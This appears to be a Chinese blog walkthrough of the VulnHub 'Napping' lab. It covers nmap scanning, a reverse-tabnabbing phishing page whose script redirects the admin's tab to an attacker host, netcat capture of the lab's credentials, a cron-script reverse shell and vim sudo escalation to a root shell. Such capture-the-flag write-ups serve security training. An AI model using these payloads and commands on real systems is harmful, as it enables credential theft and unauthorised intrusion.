4-vulnhub靶场,napping

vulnhub-napping

nmap -sP 192.168.137.0/24

攻击机:192.168.137.129
靶机:192.168.137.131
在这里插入图片描述

nmap -sV -O 192.168.137.131

开放22端口,80端口
访问web界面
在这里插入图片描述
一个登录页面。
注册一个账号
登入的场景
在这里插入图片描述
检查一下页面发现存在tabnabbing漏洞
下载界面,使其变成钓鱼链接index.html
在这里插入图片描述
再新建一个恶意链接come.html

<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.137.129:8000/index.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://192.168.137.129:8000/index.html');
    </script>
</body>
</html>

这个代码的意思就是打开这个链接的父界面将跳到’http://192.168.137.129:8000/index.html’
在这里插入图片描述
任意方法搭建http服务

systemctl start mysql
service apache2 start
监听8000端口:
nc -lvp 8000

在这里插入图片描述
得到账号和密码。
现在说一下这么做为什么可以获取数据:
'All links will be reviewed by our admin’这句话说明了管理员会点击我们传输的链接,
可以理解为:点击了我们的come.html链接后会跳转到index.html(登录界面)他以为要重新登录,所以就输入账号和密码,其实这是我们的一个网站,所以我们监听就可以接到这个报文获得信息。这里靶机貌似就是模拟有跳转就会发送报文,所以index.html是什么页面都成功的。
获取账号密码尝试登录ssh:
username=daniel&password=C%40ughtm3napping123
这里因为是post传输的所以有url编码,%40是@
账号:daniel
密码:C@ughtm3napping123

shh daniel@192.168.137.129

在这里插入图片描述
登录成功
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现daniel只是一个普通组的成员
用find命令查找admin组可以执行的程序(且daniel有权限的文件)

find / -group administrators -type f 2>/dev/null

2>/dev/null的利用
在这里插入图片描述
打开本地文件,打不开就报错,查看一下报错记录:

cat /home/adrian/site_status.txt

在这里插入图片描述
这个记录就说明它至多2分钟会执行一次这个py文件
创建sh文件
在这里插入图片描述
编辑query.py文件
在这里插入图片描述
监听9000端口即可
sudo -l 查看一下命令权限
在这里插入图片描述
Vim提权
输入:

sudo /usr/bin/vim -c ':!/bin/sh'\

在这里插入图片描述
成功

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值